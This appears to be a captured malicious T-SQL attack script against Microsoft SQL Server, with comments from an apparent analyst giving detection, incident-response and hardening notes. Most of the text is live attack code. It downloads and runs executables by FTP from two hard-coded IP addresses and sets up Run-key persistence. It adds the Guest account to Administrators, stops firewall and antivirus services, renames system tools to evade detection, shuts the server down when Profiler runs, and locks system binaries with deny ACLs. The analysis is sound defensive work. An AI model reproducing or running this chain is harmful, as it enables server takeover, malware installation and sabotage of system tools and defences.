EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit'
GO
-- Runs the same download immediately through xp_cmdshell rather than waiting for a logon.
exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit'
GO
-- Writes the same Run value name ("shell") again with 123.exe as the payload, so this entry
-- overwrites the 1.exe entry written above.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'
GO
-- Phase 11: another pass of the xp_cmdshell / sp_oacreate re-registration cycle, followed by
-- a further download-and-execute.
-- NOTE(review): the sp_OACreate 'ADODB.Stream' and sp_OASetProperty batches use an undeclared
-- @ObjectToken and an incomplete argument list; as pasted they are non-functional fragments.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
go
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
go
EXEC sp_OASetProperty @ObjectToken
go
drop procedure sp_addextendedproc
go
drop procedure sp_oacreate
go
exec sp_dropextendedproc 'xp_cmdshell'
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
-- Variant of the FTP download: the command file is named "cmd" (no extension), 123.exe from
-- 183.67.206.51 is saved as C:\cmd.exe and executed, and after a delay (ping -n 3 to
-- localhost) C:\cmd.exe is deleted again.
-- Because the payload and the command file are removed, file-system evidence may be gone;
-- process-creation and network logs are the more reliable sources for this step.
exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 183.67.206.51> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 123.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f'
go
-- Analyst note: version gate. On anything other than SQL Server 2000 the script turns on
-- the 'Ole Automation Procedures' server option. RECONFIGURE WITH OVERRIDE follows
-- as a separate statement after the ';'.
-- Detection: sp_configure changes to this option (and to xp_cmdshell) are recorded
-- in the SQL Server error log; alert on them.
-- Hardening: keep both options off and keep application logins out of sysadmin.
if(@@version like 'Microsoft SQL Server 2000%')
use master;
else
exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;
go
-- Drops any existing sp_addextendedproc and sp_OA* objects found in dbo.sysobjects
-- so they can be re-created or re-registered below.
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
go
-- Re-creates sp_addextendedproc as a thin wrapper around DBCC ADDEXTENDEDPROC. It
-- refuses to run inside an open transaction (raises error 15002 and returns 1) and
-- returns 0 otherwise.
-- IR: a user-created sp_addextendedproc in master is itself an artefact to look for.
create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
go
-- Re-registers the four OLE Automation procedures against odsole70.dll when they
-- are missing from dbo.sysobjects.
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
go
-- Analyst note: uses Scripting.FileSystemObject (through OLE Automation) to copy
-- several executables (ma.exe, cs.exe, cacls.exe, ps.exe) onto one destination,
-- c:\windows\system32\ws.exe. ws.exe is later invoked with cacls-style arguments,
-- so it is presumably meant to end up as a renamed copy of cacls.exe (TODO confirm).
-- IR: ws.exe and p.exe in system32 are not stock file names; hash them and compare
-- with cacls.exe / ftp.exe.
declare @sp_passwordo int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo out;exec sp_oamethod @sp_passwordo, 'copyfile',null,'c:\windows\system32\ma.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordod int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordod out;exec sp_oamethod @sp_passwordod, 'copyfile',null,'c:\windows\system32\cs.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordos int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordos out;exec sp_oamethod @sp_passwordos, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordode int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordode out;exec sp_oamethod @sp_passwordode, 'copyfile',null,'c:\windows\system32\ps.exe' ,'c:\windows\system32\ws.exe';
go
-- Writes c:\windows\system32\1025\run.ini containing the HKLM ...\CurrentVersion\run
-- key path followed by a bracketed number list. The file is passed to regini later
-- in this script, which points to a permission change on the Run key.
-- NOTE(review): confirm the meaning of [2 8 18] against the regini documentation.
-- IR: check the ACL on the Run key as well as its values.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]';
go
-- Copies ftp.exe (from system32 and from dllcache) to p.exe, and dllcache\cacls.exe
-- to ws.exe. This explains the 'p -s:<file>' calls elsewhere: p.exe is the FTP client
-- under another name, which sidesteps rules keyed on the ftp.exe image name.
-- Detection: match on original file name / hash, not only on process name.
declare @sp_passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2 out;exec sp_oamethod @sp_passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4 out;exec sp_oamethod @sp_passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3 out;exec sp_oamethod @sp_passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\ws.exe';
go
-- The next two batches repeat the same copies for hosts whose system directory is
-- c:\winnt (bsnr.exe appears here in place of cs.exe).
declare @sp_passwordox int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordox out;exec sp_oamethod @sp_passwordox, 'copyfile',null,'c:\winnt\system32\ma.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodx out;exec sp_oamethod @sp_passwordodx, 'copyfile',null,'c:\winnt\system32\bsnr.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordosx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordosx out;exec sp_oamethod @sp_passwordosx, 'copyfile',null,'c:\winnt\system32\cacls.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodex int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodex out;exec sp_oamethod @sp_passwordodex, 'copyfile',null,'c:\winnt\system32\ps.exe' ,'c:\winnt\system32\ws.exe';
go
declare @sp_passwordo2x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2x out;exec sp_oamethod @sp_passwordo2x, 'copyfile',null,'c:\winnt\system32\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo4x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4x out;exec sp_oamethod @sp_passwordo4x, 'copyfile',null,'c:\winnt\system32\dllcache\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo3x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3x out;exec sp_oamethod @sp_passwordo3x, 'copyfile',null,'c:\winnt\system32\dllcache\cacls.exe' ,'c:\winnt\system32\ws.exe';
go
-- Runs ws.exe through WScript.Shell with '/e /t /g system:F' against cmd.exe,
-- net1.exe, p.exe and msado15.dll. With cacls semantics that edits the ACL to grant
-- SYSTEM full control on each file.
-- IR: record the resulting ACLs before restoring them, so the change can be timed.
declare @sp_passwordcmdcov INT;declare @sp_passwordcmdcov1 INT;declare @sp_passwordcmdcov2 INT;declare @sp_passwordftpcov INT;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov2 output;exec sp_OACreate 'wscript.shell',@sp_passwordftpcov output;exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
-- Analyst note: another download-and-run variant through xp_cmdshell. It creates a
-- working directory 'iSql', writes FTP script 'j' for 183.67.206.51, fetches 1.exe
-- and starts it through a throwaway D.bat.
-- IR: look for an 'iSql' directory under the SQL Server service's working directory.
xp_cmdshell 'command.com /c md iSql&cd iSql&del *.* /f /s /q&echo open 183.67.206.51 >j&echo 123 >>j&echo 123 >>j&echo get 1.exe >>j&echo bye >>j&ftp -i -s:j&del j&echo for %%i in (1.exe) do start %%i >D.bat&D.bat&del D.bat'
go
-- Command execution without xp_cmdshell: OPENROWSET with the Jet 4.0 provider opens
-- ias.mdb and evaluates a query that calls shell().
-- Detection: OPENROWSET('microsoft.jet.oledb.4.0', ...) with 'shell(' in the query text.
-- Hardening: keep 'Ad Hoc Distributed Queries' disabled.
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51>> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit")')
go
-- Starts the SQL Server Agent service through xp_servicecontrol.
-- NOTE(review): no Agent job is created in the visible lines. Check msdb for
-- unexpected jobs in case one was added elsewhere.
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
go
-- The same FTP fetch of 123.exe, issued through xp_cmdshell and then again through
-- WScript.Shell via sp_oacreate, so that either mechanism being available is enough.
exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'
go
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit"'
go
-- Rewrites the Jet 4.0 'SandBoxMode' registry value, the setting that governs Jet's
-- expression sandboxing.
-- Detection: any write to HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode by the
-- SQL Server service account. Record the value found and restore the organisation's baseline.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit")')
go
-- Analyst note: writes the HKLM ...\run value 'shell' once more (fetch and run 123.exe
-- from 183.67.206.51).
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'
-- Account tampering through WScript.Shell: sets a password on the built-in Guest
-- account, activates it, and adds it to the local Administrators group.
-- IR: check that Guest is disabled and not a member of Administrators; review the
-- Security event log for account-change and group-membership events at this time.
DECLARE @sp_passwordnet1 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet1 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet1,'run',null, 'net1 user guest seek';
go
DECLARE @sp_passwordnet2 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet2 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet2,'run',null, 'net1 user guest /active:Y';
go
DECLARE @sp_passwordnet3 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet3 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet3,'run',null, 'net1 localgroup administrators guest /add';
go
-- Defence evasion: requests a stop of the 'sharedaccess' (firewall / ICS) service and
-- of services named KAVStart, 'Symantec Proxy Service' and 'Symantec Event Manager'
-- (presumably antivirus components; TODO confirm the exact service names on the host).
-- Detection: service-stop events for security products originating from the
-- SQL Server service account.
DECLARE @cmdpasswordn1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordne1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordn1,'run',null,'net1 stop sharedaccess';
go
DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop KAVStart';
DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Proxy Service';
go
DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Event Manager';
go
go
-- Analyst note: writes c:\windows\system32\1025\si.bat line by line through
-- Scripting.FileSystemObject. Each line greps tasklist output for a SQL Profiler
-- process name (PROFILER90.exe, SqlExpressProfiler.exe, profiler.exe) and chains a
-- shutdown-style command on a match. The last line deletes the batch file itself.
-- This reads as an anti-analysis measure aimed at an administrator tracing the
-- server. The command names are reproduced exactly as posted on the page.
-- Detection: prefer server-side traces or audit logging that do not depend on a
-- local Profiler process; look for the 1025 directory under system32.
declare @wsp_pwsswordwww int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @wsp_pwsswordwww out
exec sp_oamethod @wsp_pwsswordwww, 'createtextfile', @f out, 'c:\windows\system32\1025\si.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shwtdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shutsdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shwtdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'del c:\windows\system32\1025\si.bat';
-- Drops a procedure named wsp_pwssword if present. Its definition is not in view;
-- the same check recurs after many later steps.
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Analyst note: from here on, OS commands are issued through Jet shell() via
-- OPENROWSET. This one invokes the 'convert' utility with an NTFS argument for drive c:.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c convert c:/fs:ntfs")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Applies run.ini with regini (permissions on the Run key), clears the system/hidden
-- attributes on uc.exe under ...\MSSearch\Bin, combines uc.exe with netstat.exe into
-- ucs.exe, and stops 'sharedaccess'. The '©' is presumably a page-rendering artefact;
-- when writing signatures, match on the surrounding substrings instead.
-- IR: uc.exe / ucs.exe in C:\Progra~1\Common~1\System\MSSearch\Bin are IoCs of this sample.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c regini %SystemRoot%\system32\1025\run.ini&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe© C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe/b + netstat.exe/b C:\Progra~1\Common~1\System\MSSearch\Bin\ucs.exe&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\ucs.exe&net1 stop sharedaccess")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- The next five batches are metadata and session queries (character set, text size,
-- version, server name, login name, Agent perf counters). They do not touch the OS.
-- NOTE(review): they resemble what a management client sends on connect, so they
-- may be trace noise captured along with the payload rather than part of it.
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
SET TEXTSIZE 64512
go
select @@microsoftversion
go
select convert(sysname, serverproperty(N'servername'))
go
SELECT ISNULL(SUSER_SNAME(), SUSER_NAME())
go
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
go
-- Bulk deletion of named executables and scripts (wbem\sr.exe, wbem\gaibian.exe,
-- drivers\vs.exe, http.vbs, and others), followed by an append to cao.txt.
-- Presumably this removes earlier or competing tooling before the new payloads are
-- installed (TODO confirm).
-- IR: recover these paths from backups or shadow copies if available; the file
-- names help date earlier activity on the host.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c del ps.exe& del f.exe&attrib -s -h wbem\wbemfest.exe&del wbem\wbemfest.exe&del cs.exe&del fs.exe&del ws.exe&attrib -s -h c:\windows\system32\wbem\sr.exe&del c:\windows\system32\wbem\sr.exe&attrib -s -h c:\windows\system32\wbem\gaibian.exe&del c:\windows\system32\wbem\gaibian.exe&attrib -s -h c:\windows\system32\wbem\sp.exe&del c:\windows\system32\wbem\sp.exe&attrib -s -h c:\windows\system32\wbem\xj.exe&del c:\windows\system32\wbem\xj.exe&attrib -s -h c:\windows\system32\wbem\cacls.exe&del c:\windows\system32\wbem\cacls.exe&attrib -s -h c:\windows\system32\drivers\vs.exe&del c:\windows\system32\drivers\vs.exe&del http.vbs&del http1.vbs&del nan2.exe&del tstp.exe&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe&del C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe&del c:\fuck.txt&del caclss.exe&del c:\windows\system\1.vbs&echo caocaocao!>>cao.txt")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Analyst note: file drop through ADODB.Stream. It opens a binary stream (Type 1),
-- writes a varbinary literal and saves it as msx.exe with overwrite (option 2).
-- The literal on the page is the empty 0x, so the payload bytes are not part of
-- this listing. msx.exe is run further down through Jet shell().
-- Detection: sp_OACreate 'ADODB.Stream' followed by 'SaveToFile' in SQL text or
-- audit logs; msx.exe in the service's working directory is an IoC.
DECLARE @ObjectToken INT;EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'msx.exe', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Runs the Profiler-watch batch file written earlier (system32\1025\si.bat).
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c c:\windows\system32\1025\si.bat")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Second download stage, from a different host. It writes FTP script wpa.dat for
-- 58.218.202.35 and maps cao.exe -> rarx.exe, cao1.exe -> wbemw.exe and
-- cao2.exe -> wbems.exe.
-- IR: both IPs in this script, wpa.dat and the three local file names are IoCs.
-- Egress filtering of outbound FTP from database servers would block this stage.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c echo open 58.218.202.35>wpa.dat&echo 123>>wpa.dat&echo 521>>wpa.dat&echo get cao.exe rarx.exe>>wpa.dat&echo get cao1.exe wbemw.exe>>wpa.dat&echo get cao2.exe wbems.exe>>wpa.dat&echo bye>>wpa.dat")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Feeds wpa.dat to p.exe (the FTP client under another name) and starts the three
-- fetched files.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c p -s:wpa.dat&rarx.exe&wbemw.exe&wbems.exe")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Writes and runs nnd.bat, which waits (ping -n 25) and then starts the same three
-- files again.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c echo ping 127.0.0.1 -n 25>nnd.bat&echo rarx>>nnd.bat&echo wbemw>>nnd.bat&echo wbems>>nnd.bat&echo exit>>nnd.bat&nnd.bat")');
go
-- Analyst note: lock-down phase. Each cacls.exe call below edits an ACL (/e) to deny
-- (/d) access for 'everyone' or 'system' on a system tool: wscript.exe, cscript.exe,
-- ftp.exe, tftp.exe, net1.exe, cmd.exe, cacls.exe / icacls.exe, utilman.exe,
-- sethc.exe, msado15.dll and their dllcache copies.
-- Effect for responders: standard admin and scripting tools may fail with
-- access-denied on an affected host, and later SQL-based command execution is
-- blocked too. Remediation must restore these ACLs from a known-good baseline;
-- given the breadth of changes in this script, rebuilding the host is the safer option.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe wscript.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe ftp.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe cscript.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
-- Runs msx.exe, the file saved through ADODB.Stream earlier in the script.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c msx.exe")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe net1.exe /e /d everyone")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cmd.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\wscript.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cscript.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\net1.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\ftp.exe /e /d everyone")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cacls.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe utilman.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe p.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe icacls.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\icacls.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe sethc.exe /e /d system")');
go
-- Starts the three files fetched in the second FTP stage once more, before the
-- remaining deny entries are applied.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c wbems.exe")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c rarx.exe")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c wbemw.exe")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe cmd.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe tftp.exe /e /d system")');
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\tftp.exe /e /d system")');